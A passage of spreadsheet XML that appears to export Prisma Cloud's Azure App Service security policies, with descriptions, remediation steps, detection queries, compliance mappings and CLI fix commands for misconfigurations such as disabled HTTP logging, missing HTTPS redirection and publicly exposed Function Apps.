'cliScriptTemplate': 'az webapp auth update --resource-group $resourceGroup --name $resourceName --enabled true'</t>
        </is>
      </c>
      <c r="Z2194" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = 'kind starts with app and config.siteAuthEnabled equals false'
{"category":"General","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA2194" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2194" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2194" t="inlineStr">
        <is>
          <t>PC-AZR-APP-407-CKV_AZURE_13</t>
        </is>
      </c>
      <c r="AD2194" t="b">
        <v>1</v>
      </c>
      <c r="AE2194" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2194" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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4" t="inlineStr">
        <is>
          <t>5e94790e-0d8b-4001-b97f-b5f7670a9236</t>
        </is>
      </c>
      <c r="AI2194" t="inlineStr">
        <is>
          <t>71247168-8fae-45ba-af00-250cbc9dac68</t>
        </is>
      </c>
      <c r="AJ2194" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2194" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2195">
      <c r="A2195" t="inlineStr">
        <is>
          <t>ITSG-33, NYDFS 23 CRR-NY 500.0, GDPR, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, TX-RAMP Level 1, HITRUST CSF v.11.2.0, TX-RAMP Level 2, DORA, TX-RAMP Level 2, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, SOC 2, SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B2195" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2195" s="2" t="inlineStr"/>
      <c r="D2195" t="inlineStr"/>
      <c r="E2195" t="inlineStr"/>
      <c r="F2195" t="inlineStr"/>
      <c r="G2195" t="b">
        <v>1</v>
      </c>
      <c r="H21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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2195" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2195" t="inlineStr">
        <is>
          <t>Azure App service HTTP logging is disabled</t>
        </is>
      </c>
      <c r="L2195" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2195" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2195" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2195" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2195" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2195" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R2195" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S2195" t="inlineStr"/>
      <c r="T2195" t="b">
        <v>0</v>
      </c>
      <c r="U2195" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2195" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2195" t="inlineStr">
        <is>
          <t>This policy identifies Azure App services that have HTTP logging disabled. 
By enabling HTTP logging for your app service, you can collect log information and use it to monitor and troubleshoot your app, as well as identify any potential security issues or threats. This can help to ensure that your app is running smoothly and is secure from potential attacks. 
As best practice, it is recommended to enable HTTP logging on your app service.</t>
        </is>
      </c>
      <c r="X2195" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to App Services dashboard
3. Click on the reported App service
4. Under the 'Monitoring' menu, click on 'App Service logs'
5. Under 'Web server logging', select Storage to store logs on blob storage, or File System to store logs on the App Service file system.
6. In Retention Period (Days), set the number of days the logs should be retained.
7. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-http-logging
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-http-logging</t>
        </is>
      </c>
      <c r="Y2195" t="inlineStr"/>
      <c r="Z2195" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = properties.state equal ignore case Running and config.httpLoggingEnabled exists and config.httpLoggingEnabled is false
{"category":"Logging","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA2195" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2195" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2195" t="inlineStr">
        <is>
          <t>PC-AZR-APP-1164-CKV_AZURE_63</t>
        </is>
      </c>
      <c r="AD2195" t="b">
        <v>1</v>
      </c>
      <c r="AE2195" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2195" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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5" t="inlineStr">
        <is>
          <t>18aec02c-ae0e-4e2c-9e6f-72820d1b2909</t>
        </is>
      </c>
      <c r="AI2195" t="inlineStr">
        <is>
          <t>84837d91-6b0b-4936-87a6-f6940506a694</t>
        </is>
      </c>
      <c r="AJ2195" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2195" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2196">
      <c r="A2196" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CSA CCM v4.0.12, NIST SP 800-171 Revision 2, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, CRI Profile v1.2.1, NIST CSF v2.0, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST SP 800-172, CIS Controls v8, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v8.2 [Deprecated], APRA (CPS 234) Information Security, CIS Controls v7.1, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, FFIEC, Copy of CIS Controls v8, MITRE ATT&amp;CK v10.0 [Deprecated], Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CSA CCM v.4.0.6, CSA CCM v.4.0.6, PCI DSS v4.0, CSA CCM v.4.0.6, MITRE ATT&amp;CK v12, testazure, CRI Profile v2.0, DORA, MLPS 2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.2.0 (Azure), Copy of CIS v1.2.0 (Azure), CDC NIST 800-53 Rev4, ISO/IEC 27001:2022, CRI Profile v1.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Matt's ATT&amp;ACK, Secure Controls Framework (SCF) - 2022.2.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO 27002:2022, PCI DSS v4.0, kfirdaus AWS Account-CS, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Copy of CIS Controls v8, PCI DSS v3.2.1, NIST CSF, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CIS Controls v8, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], FFIEC, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), TX-RAMP Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight, NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], CIS Controls v7.1, NIST 800-53 Rev4, NIST CSF v2.0, CCPA 2018, PIPEDA, CIS Controls v8.1, PCI DSS v4.0, NIST 800-53 Rev 5, Brazilian Data Protection Law (LGPD), Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, RBI Baseline Cyber Security and Resilience Requirements, Sarbanes Oxley Act (SOX), CyberSecurity Law of the People's Republic of China, MLPS 2.0 (Level 2), NIST SP 800-172, CIS v1.1 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements</t>
        </is>
      </c>
      <c r="B2196" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2196" s="2" t="inlineStr"/>
      <c r="D2196" t="inlineStr"/>
      <c r="E2196" t="inlineStr"/>
      <c r="F2196" t="inlineStr"/>
      <c r="G2196" t="b">
        <v>0</v>
      </c>
      <c r="H21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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2196" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2196" t="inlineStr">
        <is>
          <t>Azure App Service Web app doesn't use latest .Net Core version</t>
        </is>
      </c>
      <c r="L2196" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2196" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2196" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2196" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2196" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2196" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2196" t="inlineStr">
        <is>
          <t>ISM-1407</t>
        </is>
      </c>
      <c r="S2196" t="inlineStr">
        <is>
          <t>AppService</t>
        </is>
      </c>
      <c r="T2196" t="b">
        <v>0</v>
      </c>
      <c r="U2196" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2196" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2196" t="inlineStr">
        <is>
          <t>This policy identifies App Service Web apps that are not configured with latest .Net Core version. Periodically, newer versions are released for .Net Core software either due to security flaws or to include additional functionality. It is recommended to use the latest .Net version for web apps in order to take advantage of security fixes, if any.</t>
        </is>
      </c>
      <c r="X2196" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Navigate to 'App Services' dashboard
3. Select the reported web app service
4. Under 'Settings' section, Click on 'Configuration'
5. Click on 'General settings' tab, Ensure that Stack is set to .NET and Minor version is set to latest version.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2196" t="inlineStr"/>
      <c r="Z2196" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = 'config.isDotnetcoreVersionLatest exists and config.isDotnetcoreVersionLatest equals false'</t>
        </is>
      </c>
      <c r="AA2196" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2196" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2196" t="inlineStr">
        <is>
          <t>PC-AZR-APP-414</t>
        </is>
      </c>
      <c r="AD2196" t="b">
        <v>1</v>
      </c>
      <c r="AE2196" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2196" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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6" t="inlineStr">
        <is>
          <t>629133a3-6e81-4288-bd38-e81cb5b708de</t>
        </is>
      </c>
      <c r="AI2196" t="inlineStr">
        <is>
          <t>36e3e60b-652b-4246-b0ef-cd473183e1ea</t>
        </is>
      </c>
      <c r="AJ2196" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2196" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2197">
      <c r="A2197" t="inlineStr"/>
      <c r="B2197" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2197" s="2" t="inlineStr"/>
      <c r="D2197" t="inlineStr"/>
      <c r="E2197" t="inlineStr"/>
      <c r="F2197" t="inlineStr"/>
      <c r="G2197" t="b">
        <v>1</v>
      </c>
      <c r="H21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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2197" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2197" t="inlineStr">
        <is>
          <t>CRLF Injection risk due to publicly exposed and vulnerable Azure Function [Python, CVE-2020-26137]</t>
        </is>
      </c>
      <c r="L2197" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2197" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2197" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2197" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2197" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2197" t="inlineStr"/>
      <c r="R2197" t="inlineStr"/>
      <c r="S2197" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2197" t="b">
        <v>0</v>
      </c>
      <c r="U2197" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2197" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2197" t="inlineStr">
        <is>
          <t>This policy identifies Azure Functions that are publicly exposed and have known exploitable CRLF injection vulnerability [Python, CVE-2020-26137].
CRLF injection vulnerability is a security flaw allowing an attacker to inject a CRLF sequence. The fact that the Azure Function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Python [CVE-2020-26137] vulnerability and public exposure reported for the Azure Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2197"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2197" t="inlineStr"/>
      <c r="Z2197" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access') AND with : (Vuln WHERE id IN ('CVE-2020-26137'))</t>
        </is>
      </c>
      <c r="AA2197" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2197" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:55</t>
        </is>
      </c>
      <c r="AC2197" t="inlineStr"/>
      <c r="AD2197" t="b">
        <v>1</v>
      </c>
      <c r="AE2197" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2197" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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7" t="inlineStr">
        <is>
          <t>dab91880-4c0c-4276-a66f-7a19ac0ef2da</t>
        </is>
      </c>
      <c r="AI2197" t="inlineStr">
        <is>
          <t>8fe9a3b5-1baa-4f55-82b6-cb41e2a4a791</t>
        </is>
      </c>
      <c r="AJ2197" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2197" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2198">
      <c r="A2198" t="inlineStr"/>
      <c r="B2198" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2198" s="2" t="inlineStr"/>
      <c r="D2198" t="inlineStr"/>
      <c r="E2198" t="inlineStr"/>
      <c r="F2198" t="inlineStr"/>
      <c r="G2198" t="b">
        <v>1</v>
      </c>
      <c r="H21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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2198" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2198" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to a publicly exposed and unauthenticated Azure Function App with wildcard IAM resource access permissions</t>
        </is>
      </c>
      <c r="L2198" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M2198" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2198" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2198" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2198" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2198" t="inlineStr"/>
      <c r="R2198" t="inlineStr"/>
      <c r="S2198" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2198" t="b">
        <v>0</v>
      </c>
      <c r="U2198" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2198" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2198" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function Apps that are publicly exposed, not configured with app authentication and have risky permissions that could potentially lead to privilege escalation.
Publicly exposed Azure Function Apps without app authentication could allow malicious actors to remotely exploit and get the initial access to the resource. The risky permissions granting wildcard resource access on the Function App further help the attackers to perform unauthorized actions in the cloud account. 
Immediate attention is required to configure Azure Function App authentication, review risky wildcard resource access permissions, and restrict public exposure reported for the Function App as soon as possible.</t>
        </is>
      </c>
      <c r="X2198"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Navigate to Function App
3. Click on the reported Function App
4. Under Settings section, Click on 'Authentication'
5. Click on 'Add identity provider'
6. Select an identity provider from the dropdown and choose other parameters as per your requirement
7. Click on 'Add'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Management group, Subscription Scope or Resource group level
6. Narrow down the scop level</t>
        </is>
      </c>
      <c r="Y2198" t="inlineStr"/>
      <c r="Z2198" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access','Azure effective permissions granting wildcard resource access','Azure Function App authentication is off')</t>
        </is>
      </c>
      <c r="AA2198" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2198" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:19</t>
        </is>
      </c>
      <c r="AC2198" t="inlineStr"/>
      <c r="AD2198" t="b">
        <v>1</v>
      </c>
      <c r="AE2198" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2198" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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8" t="inlineStr">
        <is>
          <t>7d9a4968-43af-43f5-9427-e7d7895069de</t>
        </is>
      </c>
      <c r="AI2198" t="inlineStr">
        <is>
          <t>1a593fa1-f2cf-4ff1-9db0-b6f51073ac06</t>
        </is>
      </c>
      <c r="AJ2198" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2198" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2199">
      <c r="A2199" t="inlineStr"/>
      <c r="B2199" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2199" s="2" t="inlineStr"/>
      <c r="D2199" t="inlineStr"/>
      <c r="E2199" t="inlineStr"/>
      <c r="F2199" t="inlineStr"/>
      <c r="G2199" t="b">
        <v>1</v>
      </c>
      <c r="H21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199" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2199" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2199" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed Azure Function with remote debugging enabled and insecure permissions</t>
        </is>
      </c>
      <c r="L2199" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M2199" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2199" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2199" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2199" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2199" t="inlineStr"/>
      <c r="R2199" t="inlineStr"/>
      <c r="S2199" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2199" t="b">
        <v>0</v>
      </c>
      <c r="U2199" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2199" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2199" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function Apps that are publicly exposed, Remote debugging is enabled, and have risky permissions that could potentially lead to privilege escalation. 
Publicly exposed Azure Function Apps with remote debugging enabled could allow malicious actors to remotely exploit and get initial access to the resource. Remote debugging when enabled in Azure Function will also open a few known inbound ports based on the programming language used. These open ports could be exploited and Azure App Service could be compromised for further attacks with the risky privilege escalation permissions attached to the function app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configure Azure Function app remote debugging with a disabled state, review risky privilege escalation permissions, and restrict public exposure reported for the Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2199"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Select 'App Services' from the left pane
3. Select the reported App Services
4. Go to 'Configurations' under 'Settings'
5. Click on 'General settings'
6. Select 'Off' for 'Remote debugging' under 'Debugging section
7. Click on 'Save'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built-in or custom role without risky permissions, if necessary</t>
        </is>
      </c>
      <c r="Y2199" t="inlineStr"/>
      <c r="Z2199" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access','Azure App Services Remote debugging is enabled','Azure entities with risky permissions')</t>
        </is>
      </c>
      <c r="AA2199" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2199" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:18</t>
        </is>
      </c>
      <c r="AC2199" t="inlineStr"/>
      <c r="AD2199" t="b">
        <v>1</v>
      </c>
      <c r="AE2199" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2199" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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199" t="inlineStr">
        <is>
          <t>6a9b48b8-80c2-48a5-b977-3698afa53041</t>
        </is>
      </c>
      <c r="AI2199" t="inlineStr">
        <is>
          <t>7eb78baf-1813-4159-b918-f3237a6d5cd4</t>
        </is>
      </c>
      <c r="AJ2199" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2199" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2200">
      <c r="A2200" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, ITSG-33, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2200" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2200" s="2" t="inlineStr"/>
      <c r="D2200" t="inlineStr"/>
      <c r="E2200" t="inlineStr"/>
      <c r="F2200" t="inlineStr"/>
      <c r="G2200" t="b">
        <v>1</v>
      </c>
      <c r="H22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avega-ar-azure-ad, cj_test_tagBased, jbrox-AlertRule-MSTeams-Email, jbrox-all-accounts-noDDoS-policy, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I2200" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2200" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2200" t="inlineStr">
        <is>
          <t>Azure Logic app does not redirect HTTP requests to HTTPS</t>
        </is>
      </c>
      <c r="L2200" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2200" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2200" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2200" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2200" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2200" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R2200" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S2200" t="inlineStr"/>
      <c r="T2200" t="b">
        <v>1</v>
      </c>
      <c r="U2200" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2200" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2200" t="inlineStr">
        <is>
          <t>This policy identifies Azure Logic apps that fail to redirect HTTP traffic to HTTPS.
By default, Azure Logic app data is accessible through unsecured HTTP traffic. HTTP does not include any encryption and data sent over HTTP is susceptible to interception and eavesdropping. To secure web traffic, use HTTPS which incorporates encryption through SSL/TLS protocols, providing a secure channel over which data can be transmitted safely.
As a security best practice,  it is recommended to configure HTTP to HTTPS redirection to prevent unauthorized parties from being able to read or modify the data in transit.</t>
        </is>
      </c>
      <c r="X2200" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Navigate to Logic apps
3. Click on the reported Logic app
4. Under 'Setting' section, click on 'Configuration'
5. Under 'General settings' tab, Select 'On' radio button for 'HTTPS Only' option.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2200" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/Write' permission. Successful execution set on HTTPS-only feature,
by which non-secure HTTP requests can be restricted and all HTTP requests will be redirected to the secure HTTPS port.",
'impact': 'Sets HTTPS-only feature on the Azure Logic app',
'cliScriptTemplate': 'az logicapp update --resource-group $resourceGroup --name $resourceName --set httpsOnly=true'</t>
        </is>
      </c>
      <c r="Z2200" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = properties.state equal ignore case Running and kind contains workflowapp and properties.httpsOnly is false</t>
        </is>
      </c>
      <c r="AA2200" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2200" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2200" t="inlineStr">
        <is>
          <t>PC-AZR-APP-1212</t>
        </is>
      </c>
      <c r="AD2200" t="b">
        <v>1</v>
      </c>
      <c r="AE2200" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2200" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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avega-ar-azure-ad - Notifications:, AccountGroups:avega-active-directory;,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0" t="inlineStr">
        <is>
          <t>00cd7228-1641-4a8c-aff8-523501693ab1</t>
        </is>
      </c>
      <c r="AI2200" t="inlineStr">
        <is>
          <t>2a377921-af8b-4c81-bba8-121f94b9ded4</t>
        </is>
      </c>
      <c r="AJ2200" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2200" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2201">
      <c r="A2201" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CSA CCM v4.0.12, Azure Security Benchmark (v2), NIST SP 800-171 Revision 2, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, CRI Profile v1.2.1, NIST CSF v2.0, NIST SP 800-171 Revision 3, New Zealand Information Security Manual (NZISM v3.4), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, Azure Security Benchmark (v2), NIST SP 800-172, CIS Controls v8, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS v1.4.0 (Azure), ACSC Information Security Manual (ISM), Copy of Azure Security Benchmark (v3), MITRE ATT&amp;CK v8.2 [Deprecated], Azure Security Benchmark (v3), APRA (CPS 234) Information Security, CIS Controls v7.1, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, FFIEC, Copy of CIS Controls v8, MITRE ATT&amp;CK v10.0 [Deprecated], CIS v1.2.0 (Azure), CIS v1.5.0 (Azure) - Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CSA CCM v.4.0.6, CSA CCM v.4.0.6, PCI DSS v4.0, CSA CCM v.4.0.6, MITRE ATT&amp;CK v12, CRI Profile v2.0, DORA, MLPS 2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of Azure Security Benchmark (v3), CDC NIST 800-53 Rev4, ISO/IEC 27001:2022, CIS v1.3.0 (Azure), CRI Profile v1.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, MTSBv2_Azure, Matt's ATT&amp;ACK, Secure Controls Framework (SCF) - 2022.2.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Copy of CIS v1.2.0 (Azure), ISO 27002:2022, kfirdaus AWS Account-CS, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Copy of CIS Controls v8, PCI DSS v3.2.1, NIST CSF, Copy of 